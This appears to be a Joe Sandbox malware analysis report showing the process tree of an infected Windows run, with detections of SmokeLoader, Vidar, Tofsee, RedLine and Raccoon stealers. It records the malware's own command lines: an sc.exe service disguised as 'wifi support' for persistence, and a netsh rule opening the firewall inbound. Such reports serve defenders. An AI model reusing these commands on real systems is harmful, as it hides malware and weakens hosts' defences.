                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: explorer.exe PID: 3440 Parent PID: 3416

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:10
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                    Imagebase:0x7ff6f22f0000
                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: gdrgbdj PID: 2468 Parent PID: 936

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:45
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\gdrgbdj
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\gdrgbdj
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:319488 bytes
                                                                                                                                                    MD5 hash:9AF4D2022DC05C2DBBC4D218A8F0974C
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: gdrgbdj PID: 3492 Parent PID: 2468

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:47
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\gdrgbdj
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\gdrgbdj
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:319488 bytes
                                                                                                                                                    MD5 hash:9AF4D2022DC05C2DBBC4D218A8F0974C
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: 1E7F.exe PID: 5200 Parent PID: 3440

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:49
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1E7F.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1E7F.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:301056 bytes
                                                                                                                                                    MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Analysis Process: 2DB3.exe PID: 5640 Parent PID: 3440

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:52
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\2DB3.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\2DB3.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:322560 bytes
                                                                                                                                                    MD5 hash:6009BCB680BE6C0F656AA157E56423DC
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: svchost.exe PID: 5636 Parent PID: 560

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:52
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                    Imagebase:0x7ff6b7590000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: WerFault.exe PID: 5668 Parent PID: 5636

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:53
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                                                                                                                                                    Imagebase:0x1010000
                                                                                                                                                    File size:434592 bytes
                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: 309C.exe PID: 5132 Parent PID: 3440

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:56
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\309C.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\309C.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:320512 bytes
                                                                                                                                                    MD5 hash:8B25D9317E18654C3F83EF8630D1DE16
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: WerFault.exe PID: 5648 Parent PID: 5200

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:58
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                                                                                                                                                    Imagebase:0x1010000
                                                                                                                                                    File size:434592 bytes
                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: 3F71.exe PID: 5196 Parent PID: 3440

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:59
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    Imagebase:0x130000
                                                                                                                                                    File size:537088 bytes
                                                                                                                                                    MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                                                                                    Analysis Process: cmd.exe PID: 852 Parent PID: 5132

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:02
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 5296 Parent PID: 852

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:02
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: cmd.exe PID: 5820 Parent PID: 5132

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:03
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 6068 Parent PID: 5820

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:03
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: sc.exe PID: 4636 Parent PID: 5132

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:03
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                    Imagebase:0x7ff7ebed0000
                                                                                                                                                    File size:60928 bytes
                                                                                                                                                    MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 3500 Parent PID: 4636

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:04
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: sc.exe PID: 5360 Parent PID: 5132

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:04
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
                                                                                                                                                    Imagebase:0x1100000
                                                                                                                                                    File size:60928 bytes
                                                                                                                                                    MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 1360 Parent PID: 5360

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:05
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: sc.exe PID: 1148 Parent PID: 5132

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:05
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\sc.exe" start ozuqupbe
                                                                                                                                                    Imagebase:0x1100000
                                                                                                                                                    File size:60928 bytes
                                                                                                                                                    MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 1352 Parent PID: 1148

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:06
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: tejjnepq.exe PID: 2320 Parent PID: 560

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:06
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:15600640 bytes
                                                                                                                                                    MD5 hash:310337FA2432C256984AA89486B74D95
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Analysis Process: netsh.exe PID: 5308 Parent PID: 5132

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:06
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                    File size:82944 bytes
                                                                                                                                                    MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 3532 Parent PID: 5308

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:07
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: svchost.exe PID: 4692 Parent PID: 2320

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:08
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:svchost.exe
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:44520 bytes
                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Analysis Process: 3F71.exe PID: 1508 Parent PID: 5196

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:10
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:537088 bytes
                                                                                                                                                    MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.504088961.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.503538300.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.504557008.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Analysis Process: svchost.exe PID: 5368 Parent PID: 560

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:11
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                    Imagebase:0x7ff6b7590000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: svchost.exe PID: 5728 Parent PID: 560

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:22
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                    Imagebase:0x7ff6b7590000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: A7F0.exe PID: 2200 Parent PID: 3440

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:26
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:905216 bytes
                                                                                                                                                    MD5 hash:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >